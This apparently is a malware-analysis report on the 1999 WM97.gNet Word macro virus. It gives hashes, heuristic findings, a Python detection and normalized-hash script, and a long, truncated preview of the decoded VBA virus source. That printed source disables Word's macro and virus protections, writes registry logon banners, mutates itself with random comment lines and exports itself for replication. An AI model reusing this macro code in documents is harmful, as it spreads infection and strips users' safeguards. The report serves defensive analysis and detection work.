gNet — Office (OLE) malware analysis

Static analysis result for SHA-256 3673ac4615b52c9b…

MALICIOUS

Office (OLE)

Size: 50.5 KB
Created: 2000-04-16 12:40:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b0345d7539fb18c693217620e15b25a1
SHA-1: c56c323d254710ad7743b9e72f54c2d3e109b0ac
SHA-256: 3673ac4615b52c9bc071918c1da5ff10c2b43a3df3fe79fd9dac830cb4a703cf
Risk score: 300

Malware Insights

gNet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

ClamAV identifies the sample as Doc.Trojan.Gnet-1 and the extracted VBA module labels itself 'This is gNet Macro Virus version 2' (WM97.gNet, astigmatiZm, 1999). Most of the visible code in main() is self-protection aimed at Word rather than at the operating system: it forces auto macros back on with WordBasic.DisableAutoMacros 0 (an argument of 0 re-enables them), hides and locks the 'Visual Basic' command bar, deletes the Tools > Macro and Customize... menu items, disables the Alt+F11 and Alt+F8 shortcuts, and turns off Options.VirusProtection and ConfirmConversions using a split string (k$ = "Fa": s$ = "lse") so that the literal "False" never appears in the source. Through System.PrivateProfileString with an empty file name (which targets the registry) it sets HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption to 'Windows Critical Error' and LegalNoticeText to a fake Y2K warning; this is a nuisance logon banner, not a security-control bypass. The module pads itself with random 'Rem' comment lines, or strips them once it exceeds 300 lines, so its size and hash differ between infections, and Routine() reaches NormalTemplate.VBProject.VBComponents and exports the module to C:\gNet.sys, the usual macro-virus route into the Normal template. Payload() fires only on 10 September and shows an Office Assistant balloon before hiding the mouse cursor. The heuristics additionally report a Shell() call and an AutoOpen procedure; neither appears in the portion of the macro source shown below, which is truncated, so their context cannot be confirmed from this preview. Nothing in the visible code downloads or stages a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Trojan.Gnet-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Gnet-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this is the rule's generic description; for this sample a VBA project was recovered (see macros.bas below) and a family marker (Doc.Trojan.Gnet-1) is present, so the finding is redundant here.
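The generic heuristics above (Shell, AutoOpen, p-code tokens) do not name what gNet's main() and Routine() actually do: switch off Word's own macro protections, write HKLM via System.PrivateProfileString, reach into VBProject for self-replication, and pad the module with random 'Rem' lines so each generation hashes differently. The following is an added example written for this report, not output of the analysis engine or code from the malware author: it runs over a trimmed excerpt of the macros.bas preview (a constructed test input, not the full 17 KB module), resolves the k$ + s$ split-string trick before matching, reports which behaviours fire, and computes a hash with the polymorphic padding removed. The indicator names and helper functions (`scan`, `normalized_macro_hash`, `make_polymorphic_variant`) are this example's own.

```python
"""Triage helpers for a Word macro-virus VBA dump (added example, not analysis-engine output).
Flags gNet's Word-hardening bypass and self-replication behaviour; hashes the module minus its 'Rem' padding."""
import hashlib
import random
import re

# Excerpt of this report's macros.bas preview, trimmed to the relevant lines (constructed test input).
VBA_SAMPLE = r'''
Sub main()
        On Error Resume Next
        Set ksg = Application.VBE.ActiveVBProject.VBComponents: Set tre = CodeModule
        k$ = "Fa": s$ = "lse"
        WordBasic.DisableAutoMacros 0
        cb("Visual Basic").Enabled = False
        cb("Tools").Controls("Macro").Delete
        FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "Windows Critical Error"
        With Options
                .VirusProtection = k$ + s$
        End With
        Rem QFsBwHpTk
        With ksg("gNet").tre
                .InsertLines RndLine, "Rem " & pstring
        End With
End Sub
Sub Routine()
        ksg("gNet").Export "C:\gNet.sys"
End Sub
'''

# Indicator name -> regex (case-insensitive), matched after split-string resolution.
INDICATORS = {
    "word_virus_protection_off": r'\.VirusProtection\s*=\s*"?False"?',
    "auto_macros_forced_on": r"WordBasic\.DisableAutoMacros\s+0",
    "vb_editor_ui_disabled": r'\("Visual Basic"\)\.\w+\s*=\s*False|Controls\("Macro"\)\.Delete',
    "vbe_hotkeys_disabled": r"FindKey\(BuildKeyCode\(.+\)\)\.Disable",
    "hklm_write_via_profilestring": r'PrivateProfileString\(\s*"",\s*"HKEY_',
    "vbproject_access_self_replication": r"VBProject\.VBComponents",
    "module_export_to_disk": r'\.Export\s+"[A-Za-z]:\\',
    "runtime_code_insertion_polymorphism": r"\.InsertLines\b",
}
_STR_CONST = re.compile(r'(?<!\w)(\w+\$)\s*=\s*"([^"]*)"')
_CONCAT = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')

def resolve_split_strings(src: str) -> str:
    """Inline `name$ = "lit"` constants at their use sites and fold "a" + "b" into "ab",
    so the sample's  .VirusProtection = k$ + s$  reads as  .VirusProtection = "False"."""
    consts = dict(_STR_CONST.findall(src))
    out = []
    for line in src.splitlines():
        for name, lit in consts.items():
            # substitute uses only; a name$ directly followed by '=' is the defining assignment
            line = re.sub(r"(?<!\w)" + re.escape(name) + r"(?!\s*=)",
                          lambda m, lit=lit: '"%s"' % lit, line)
        while (folded := _CONCAT.sub(lambda m: '"%s%s"' % m.group(1, 2), line)) != line:
            line = folded
        out.append(line)
    return "\n".join(out)

def scan(src: str) -> dict:
    """Return {indicator: [1-based line numbers]} for every indicator that fires."""
    lines = resolve_split_strings(src).splitlines()
    hits = {}
    for name, pat in INDICATORS.items():
        where = [i for i, ln in enumerate(lines, 1) if re.search(pat, ln, re.I)]
        if where:
            hits[name] = where
    return hits

def raw_hash(src: str) -> str:
    return hashlib.sha256(src.encode()).hexdigest()

def normalized_macro_hash(src: str) -> str:
    """SHA-256 over the module with comment/Rem lines dropped and whitespace collapsed.
    gNet inserts random 'Rem ...' lines each generation, so the raw hash changes per infection; this one does not."""
    kept = [re.sub(r"\s+", " ", ln.strip()) for ln in src.splitlines()
            if ln.strip() and not ln.strip().startswith("'")
            and not re.match(r"rem\b", ln.strip(), re.I)]
    return hashlib.sha256("\n".join(kept).encode()).hexdigest()

def make_polymorphic_variant(src: str, seed: int = 7) -> str:
    """Re-implement the padding loop from main(): 1-10 'Rem' lines of 1-39 random letter pairs
    (Chr(65+Rnd*22) & Chr(122-Rnd*22)) at random positions, to show the normalized hash ignores them."""
    rng = random.Random(seed)
    lines = src.splitlines()
    for _ in range(rng.randint(1, 10)):
        junk = "".join(chr(65 + rng.randrange(22)) + chr(122 - rng.randrange(22))
                       for _ in range(rng.randint(1, 39)))
        lines.insert(rng.randrange(len(lines) + 1), "Rem " + junk)
    return "\n".join(lines)

if __name__ == "__main__":
    for name, where in scan(VBA_SAMPLE).items():
        print(f"{name:36s} lines {where}")
    variant = make_polymorphic_variant(VBA_SAMPLE)
    print("raw hash changed:      ", raw_hash(variant) != raw_hash(VBA_SAMPLE))
    print("normalized hash stable:", normalized_macro_hash(variant) == normalized_macro_hash(VBA_SAMPLE))
```

Two design points. The split-string pass is deliberately narrow (only `name$ = "literal"` constants joined with `+` or `&`); it is enough for this family's trick and avoids turning the scanner into a VBA interpreter. The normalized hash drops only comment lines, which is exactly the mutation surface this engine uses; a family that rewrites identifiers or statement order would need a token-level normalization instead.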

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17757 bytes
SHA-256: 25531e05d723b2f91270d393b1fa140e11d9ead794badbfdd728f91680f3a341
Detection
ClamAV: Doc.Trojan.Gnet-1
Obfuscation or payload: unlikely (tool verdict; the source does carry light obfuscation that this field does not score: "False" is assembled from k$ + s$, and the module inserts or strips random 'Rem' lines to vary its own size)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "gNet"
' This is gNet Macro Virus version 2
' (c) 1999 by ksg
' astigmatiZm virus group
' www.astigmatiZm.cjb.net
' rename this file to gNet.bas and import it in MS Words Visual Basic Editor to activate

Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer

'----------------------
'  WM97.gNet version 2
' ---------------------
' (c) by KSG [ AMACC ]
' ---------------------
'   [ Astig Matizm ]
'

Sub main()
        On Error Resume Next
        Set ksg = Application.VBE.ActiveVBProject.VBComponents: Set tre = CodeModule
        Set cb = CommandBars: Set cbvisible = Visible: Set cbProtection = Protection
        k$ = "Fa": s$ = "lse"
        WordBasic.DisableAutoMacros 0
        cb("Visual Basic").cbvisible = False
        cb("Visual Basic").Enabled = False
        cb("Visual Basic").cbProtection = msoBarNoChangeVisible
        cb("Visual Basic").cbProtection = msoBarNoCustomize
        cb("Tools").Controls("Macro").Delete
        cb("Tools").Controls("Customize...").Delete
        CustomizationContext = NormalTemplate
        FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
        FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
        AtiveDocument.ReadOnlyRecommended = False
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "Windows Critical Error"
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "This version of Windows is not Y2K ready. Please Upgrade Today! www.microsoft.com"
        
                With Application
                        .EnableCancelKey = wdCancelDisabled
                        .DisplayAlerts = wdAlertsNone
                End With
                
                With Options
                        .ConfirmConversions = k$ + s$
                        .VirusProtection = k$ + s$
                End With

        Randomize

        ActiveLines = ksg("gNet").tre.CountOfLines
        
        If ActiveLines > 300 Then
                        With ksg("gNet").tre
        
        For TheLine = 1 To .CountOfLines
                If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
        Next TheLine
        End With
        Else
                With ksg("gNet").tre
                vsize = Int(Rnd * 10)
        For loop1 = 1 To vsize
                pstring = ""
                PolyLines = .CountOfLines
                RndLine = Int(Rnd * PolyLines) + 1
                psize = Int(Rnd * 39) + 1
        For loop2 = 1 To psize
                pstring = pstring & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
        Next loop2
                .InsertLines RndLine, "Rem " & pstring
        Next loop1

        End With
        End If
        If Day(Now()) = 10 And Month(Now()) = 9 Then Call Payload

End Sub

Sub Payload()
On Error Resume Next

Assistant.Visible = True

With Assistant.NewBalloon
        .Icon = msoIconAlert
        .Text = "W 9 7 M . g N e t   b y   k s g" & vbCr & "" & vbCr & "  www.astigmatiZm.cjb.net "
        .Heading = "astigmatiZm VX Team"
        .Animation = msoAnimationSearching
        .Show
End With

Assistant.Visible = False

While ShowCursor(False) >= 0
Wend

End Sub

Sub Routine()
On Error Resume Next

        Set amt = NormalTemplate.VBProject.VBComponents
        Set ksg = Application.VBE.ActiveVBProject.VBComponents: Set tre = CodeModule
        Application.EnableCancelKey = wdCancelDisabled

With Options
        .SaveNormalPrompt = (Rnd * 0)
        .VirusProtection = (Rnd * 0)
        .ConfirmConversions = (Rnd * 0)
End With
ksg("gNet").Export "C:\gNet.sys"

        For x = 1 To amt.Co
... (truncated)